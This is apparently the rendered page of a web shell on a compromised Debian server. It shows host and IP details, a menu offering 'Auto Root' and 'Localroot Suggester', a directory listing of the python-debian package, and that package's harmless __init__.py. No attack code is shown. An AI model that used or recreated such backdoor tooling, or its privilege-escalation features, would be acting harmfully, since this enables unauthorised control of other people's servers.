Linux v69820.1blu.de 4.15.0 #1 SMP Mon Sep 30 15:36:27 MSK 2024 x86_64
Apache/2.4.58
Server IP : 195.90.215.149 & Your IP : 216.73.216.250
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
lib /
python3 /
dist-packages /
debian /
Delete
Unzip
Name
Size
Permission
Date
Action
__pycache__
[ DIR ]
drwxr-xr-x
2024-07-10 10:59
_deb822_repro
[ DIR ]
drwxr-xr-x
2024-07-10 10:59
__init__.py
1012
B
-rw-r--r--
2023-01-31 19:04
_arch_table.py
18.04
KB
-rw-r--r--
2023-01-31 19:04
_util.py
13.23
KB
-rw-r--r--
2023-01-31 19:04
_version.py
63
B
-rw-r--r--
2023-02-01 09:32
arfile.py
13.48
KB
-rw-r--r--
2023-01-31 19:04
changelog.py
38.1
KB
-rw-r--r--
2023-01-31 19:04
copyright.py
30.69
KB
-rw-r--r--
2023-01-31 19:04
deb822.py
94.59
KB
-rw-r--r--
2023-01-31 19:04
debfile.py
18.92
KB
-rw-r--r--
2023-01-31 19:04
debian_support.py
26.79
KB
-rw-r--r--
2023-01-31 19:04
debtags.py
18.58
KB
-rw-r--r--
2023-01-31 19:04
deprecation.py
1.7
KB
-rw-r--r--
2023-01-31 19:04
py.typed
0
B
-rw-r--r--
2023-01-31 19:04
substvars.py
14.53
KB
-rw-r--r--
2023-01-31 19:04
watch.py
9.31
KB
-rw-r--r--
2023-01-31 19:04
Save
Rename
""" Tools for working with Debian-related file formats """ __version__ = "" try: # pylint: disable=no-member import debian._version __version__ = debian._version.__version__ except ImportError: try: # Try to extract the version from the package changelog and # determine whether it is a post-release or pre-release version. import os.path import debian.changelog changelog_filename = os.path.join( os.path.dirname(__file__), '..', '..', 'debian', 'changelog') with open(changelog_filename, 'rb') as fh: c = debian.changelog.Changelog(fh) version = str(c.version) mark = "~" if c.distributions == 'UNRELEASED' else "+" except: # pylint: disable=bare-except # Fake a version string in desperation version = '0.0.0' mark = '-' import datetime timestamp = datetime.datetime.utcnow().strftime("%Y%m%d") __version__ = "%s%sgit%s" % (version, mark, timestamp)